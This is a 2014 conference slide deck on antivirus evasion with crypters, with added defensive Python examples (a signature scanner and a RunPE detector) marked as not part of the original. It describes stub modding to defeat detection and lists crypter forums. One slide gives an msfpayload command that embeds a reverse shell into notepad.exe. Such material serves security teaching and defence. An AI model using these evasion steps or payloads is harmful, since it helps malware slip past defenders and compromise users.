
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay


AntiVirus Evasion Techniques
Use of Crypters
Presentation 2k14 at MundoHackerDay Congress
Kevin Mitnick was also there ;)



  1. AntiVirus Evasion: Use of Crypters. Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  2. Whoami. ncd:~ apasamar$ whoami -> apasamar (apasamar@incide.es, @apasamar, a.k.a. brajan). ncd:~ apasamar$ cat apasamar.cv -> Electrical Engineer and Master in Information Security; Co-founder of INCIDE: Electronic Evidence Experts; Forensics / Expert Witness Reports; Incident Response; IT Security Auditors and Consultants. ncd:~ apasamar$ rm apasamar.cv
  3. What is this about... • Introduction • AVs: how they work • Malware types and AV detection • Evasion techniques: auto-encryption, polymorphism, obfuscation, compression • Crypters: types, stub, FUD stub • Modding techniques • Resources
  4. Introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV companies -> Detect MALWARE • Bad guys: make MALWARE UNDETECTABLE
  5. Introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies -> MALWARE Detection • BAD GUYS: Undetect MALWARE
  6. Introduction. Bad guys' objective:
  7. Introduction. Bad guys' objective:
  8. AV howto • AntiVirus scans binaries on the HARD DISK • It does NOT SCAN MEMORY, only the binaries that 'start' the running processes • Scans for signatures: binary sequences in the AV database • Looks for malicious techniques (heuristics): APIs, functions, XOR, etc. • Sandbox (partial execution): looks for decryption routines, etc.
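The signature matching this slide describes, as an added example (not code from the deck or from INCIDE): a minimal on-disk scanner that matches byte-sequence signatures, with `??` as a wildcard byte, against a file image. The signature names, patterns and the sample image are all constructed for the demonstration and are not real AV signatures.

```python
"""Minimal signature scanner: match byte-sequence signatures against a file image.

Signatures are written as space-separated hex bytes; '??' matches any byte.
Everything here (signature names, patterns, sample image) is constructed.
"""


def parse_signature(text):
    """'4D 5A ?? 50' -> [0x4D, 0x5A, None, 0x50]; None is the wildcard."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def scan(data, signatures):
    """Return (signature_name, offset) for every place a signature matches in data."""
    hits = []
    for name, text in signatures.items():
        pattern = parse_signature(text)
        n = len(pattern)
        for off in range(len(data) - n + 1):
            if all(p is None or data[off + i] == p for i, p in enumerate(pattern)):
                hits.append((name, off))
    return hits


# Constructed signature database (not real AV entries).
SIGNATURES = {
    "demo.stub.entry": "55 8B EC 83 EC ?? E8",  # prologue with a wildcard for the frame size
    "demo.xor.loop": "80 34 ?? 22",             # another constructed byte pattern
}

# Constructed file image: a fake 'MZ' header, padding, the signature bytes, then NOPs.
SAMPLE_IMAGE = (
    bytes.fromhex("4d5a9000")
    + b"\x00" * 12
    + bytes.fromhex("558bec83ec10e8")
    + b"\x90" * 8
)


def scan_sample():
    """Scan the constructed image; the first signature matches at offset 16."""
    return scan(SAMPLE_IMAGE, SIGNATURES)


if __name__ == "__main__":
    for name, off in scan_sample():
        print(f"{name} matched at offset {off:#x}")
```

The wildcard is what lets one database entry cover variants that differ in an operand byte; a signature without wildcards is only as good as the exact bytes it was cut from, which is why the later slides on modding the stub concentrate on finding exactly which bytes the scanner keyed on.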
  9. AV howto (diagram): EXECUTABLE -> DISK -> RAM -> PROCESS; where does the AV SCAN?
  10. AV howto • AV analysis process: Atacs
  11. AV howto • Recommended: "Abusing File Processing in Malware Detectors for Fun and Profit" (2012), Suman Jana and Vitaly Shmatikov, The University of Texas at Austin
  12. AV howto • Metasploit Framework (Rapid7) • Community Edition: msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: generates AV-evading dynamic payloads
  13. Types of malware and AV detection • Commercial SPY programs (whitelisted, signed): e-blaster, 007, Perfect Keylogger, …
  14. Types of malware and AV detection • Newly created malware: LOW detection (NO known signatures), possible heuristic detections
  15. Types of malware and AV detection • Existing malware (very well known; signature and heuristic detections): trojans (BiFrost, PoisonIvy, CyberGate, SpyNet, DarkComet), downloaders, password stealers, reverse shells
  16. How can we make malware that AV already detects undetectable? • Crypters: software that lets you encrypt ANY MALWARE, making it undetectable to AV.
  17. Crypters
  18. Builder / stub • Builder: responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE • Stub: its mission is to decrypt and run the ENCRYPTED MALWARE
  19. Builder / stub (diagram): CRYPTER (Builder) + STUB; DETECTED MALWARE -> ENCRYPTED MALWARE (XOR, RC4, ...); output STUB + ENCRYPTED MALWARE as exe, dll or resource
  20. Builder / stub (diagram): STUB | splitter | CRYPTED MALWARE | splitter | KEY. A resource section can always be used.
  21. Builder / stub • Crypter types: ScanTime, RunTime
  22. Stub • ScanTime (diagram): STUB, CRYPTED MALWARE, DETECTED MALWARE, HARD DISK, AV
  23. Stub • RunTime (diagram): STUB, ENCRYPTED MALWARE, HARD DISK, RAM, DETECTED MALWARE, AV
  24. Stub • STUB modules: Decrypt routine; RunPE (Dynamic Forking) routine
  25. RunPE or Dynamic Forking (diagram): CreateProcess (CREATE_SUSPENDED), GetThreadContext, PEB, EBX / EAX, BaseAddress 1 / EP 1 (process 1), ReadFile, WriteProcessMemory, BaseAddress 2 / EP 2 (process 2), SetThreadContext, ResumeThread
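The call chain on this slide is also what a defender looks for, so here is an added example (not from the deck or from INCIDE) of detection logic: a small Python routine that walks a constructed API-call trace and flags a caller that creates a child with CREATE_SUSPENDED and then completes GetThreadContext, WriteProcessMemory, SetThreadContext and ResumeThread against that same child. The trace line format, the pids and the addresses are all assumptions made up for the example.

```python
"""Detect the RunPE / dynamic-forking call sequence in a constructed API trace.

Trace line format (an assumption for this example, not a real tool's output):
    <caller_pid> <api_name> key=value key=value ...
"""

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit for CreateProcess

# The ordered calls from the RunPE slide that, together, form the pattern.
# ReadFile is left out: reading the payload file says nothing about the child.
RUNPE_SEQUENCE = ("CreateProcess", "GetThreadContext", "WriteProcessMemory",
                  "SetThreadContext", "ResumeThread")


def parse_trace(lines):
    """Turn trace lines into (caller_pid, api, args) tuples; skip blanks and comments."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        caller, api = int(parts[0]), parts[1]
        args = dict(kv.split("=", 1) for kv in parts[2:])
        events.append((caller, api, args))
    return events


def find_hollowing(events):
    """Return (caller_pid, child_pid) pairs for which the whole sequence was seen.

    State is kept per (caller, child): the index of the next expected call.
    Unrelated calls in between do not reset the state, but the full chain must
    complete against a child that was created suspended.
    """
    expected = {}  # (caller, child) -> index into RUNPE_SEQUENCE
    hits = []
    for caller, api, args in events:
        if api == "CreateProcess":
            flags = int(args.get("flags", "0"), 0)
            if flags & CREATE_SUSPENDED:
                expected[(caller, int(args["child_pid"]))] = 1
            continue
        if "target_pid" not in args:
            continue
        key = (caller, int(args["target_pid"]))
        idx = expected.get(key)
        if idx is not None and api == RUNPE_SEQUENCE[idx]:
            idx += 1
            if idx == len(RUNPE_SEQUENCE):
                hits.append(key)
                del expected[key]
            else:
                expected[key] = idx
    return hits


# Constructed sample trace: pid 200 performs RunPE against its child 201;
# pid 100 is a normal launcher; pid 300 only suspends and resumes (debugger-like).
SAMPLE_TRACE = """
100 CreateProcess child_pid=101 flags=0x0
100 WaitForSingleObject target_pid=101
200 CreateProcess child_pid=201 flags=0x4
200 GetThreadContext target_pid=201
200 ReadFile handle=0x1c
200 WriteProcessMemory target_pid=201 address=0x400000
200 WriteProcessMemory target_pid=201 address=0x401000
200 SetThreadContext target_pid=201
200 ResumeThread target_pid=201
300 CreateProcess child_pid=301 flags=0x4
300 ResumeThread target_pid=301
""".splitlines()


def scan_sample():
    """Run the detector over the constructed trace; only (200, 201) should be flagged."""
    return find_hollowing(parse_trace(SAMPLE_TRACE))


if __name__ == "__main__":
    for caller, child in scan_sample():
        print(f"RunPE pattern: pid {caller} rewrote and resumed its suspended child {child}")
```

The point of keeping state per (caller, child) pair rather than per API name is the same reason slide 8 matters: a disk scanner never sees the decrypted payload, but the sequence of calls needed to place it into the suspended child is visible to anything that monitors those calls, and a debugger that merely suspends and resumes (pid 300 above) does not complete the chain.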
  26. FUD • Target: FUD stub (Fully UnDetectable) • From source code • From binary code • How? • MODDING
  27. Modding source code • Manually or using obfuscation tools: • Function replacement (SPLIT, ...) • Function/string/variable replacement and obfuscation; use of rot13 or hex encoding • Encryption: RC4 and XOR are very well known to AV; alternatives: TEA, DES, etc. • Alternative RunPE routines • Fake APIs • TLB (Tab Library File) • Trash code
  28. Modding binary file • Techniques: Dsplit/AvFucker, SignatureFucker, Hexing, RIT, XOR and variants, Tips
  29. Modding binary file • We have to undetect the STUB; the BUILDER is only a tool used at home, not in the wild • The first step is to FIND the AV SIGNATURES: simple signatures, multiple signatures, heuristic signatures
  30. Modding binary file • Recommended: "Bypassing Anti-Virus Scanners" (2012), InterNOT Security Team
  31. Modding binary file • What if we use a simple encryption/decryption routine inside the STUB? (diagram) stub.exe: EP, signatures -> stub.exe: OLD EP, signatures encrypted, NEW EP at the decryption routine
  32. Modding binary file • ORIGINAL STUB: MULTIPLE AV SCAN. Do NOT use VirusTotal for these scans or your STUB samples will be sent to the AV companies :(
  33. Modding binary file • ENCRYPTION ROUTINE • NEW EP • INSERT ROUTINE in the .text SECTION, from offset 1050 to the Import Table
  34. Modding binary file • ENCRYPTION ROUTINE AT NEW EP, used only to encrypt the .text section (used once). Set a breakpoint here, after the encryption routine.
  35. Modding binary file • DECRYPTION AND EXECUTION AT NEW EP
  36. Modding binary file • MODIFIED STUB: MULTIPLE AV SCAN, 16 AVs KO
  37. Modding binary file • Techniques: Dsplit/AvFucker, SignatureFucker, Hexing, RIT, XOR and variants, Tips
  38. Modding binary file • DSplit (diagram): Header + EXE body; then Header + 1000 bytes of EXE body, Header + 2000 bytes, Header + 3000 bytes, ··· Header + N×1000 bytes
  39. Modding binary file • AvFucker (diagram): Header + EXE body; then copies in which successive 1000-byte blocks of the EXE body are overwritten with 0000000000, ··· one copy per block
  40. Modding binary file • RIT technique • Find out the AV signature • If the signature is located in instruction code -> break the flow • Jump to another address (a hole in the section where you can write your code) • Execute the pending instructions • Return/jump to the appropriate instruction
  41. Modding binary file • XOR technique • Find out the AV signature • XOR a byte with any value, e.g. 22 • Modify the EP or jump to your hole • Apply XOR 22 to the modified byte • Return/jump to the appropriate instruction
  42. Modding binary file (figure): detected bytes (EP); XOR of the detected bytes; new EP (XORs and jump to the original EP)
  43. Other techniques • Add fake APIs • Hex string edit • Move/change function calls • Change function call type: by name / by offset • Insert detected DLL function into stub code
  44. Resources • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org
  45. INCIDE - Investigación Digital. Avda. Diagonal, 640 6ª Planta, 08017 Barcelona (Spain). Tel./Fax. +34 932 546 277 / +34 932 546 314. info@incide.es, http://www.incide.es, http://www.twitter.com/1NC1D3, http://www.atrapadosporlosbits.com, http://www.youtube.com/incidetube. ANY QUESTIONS?
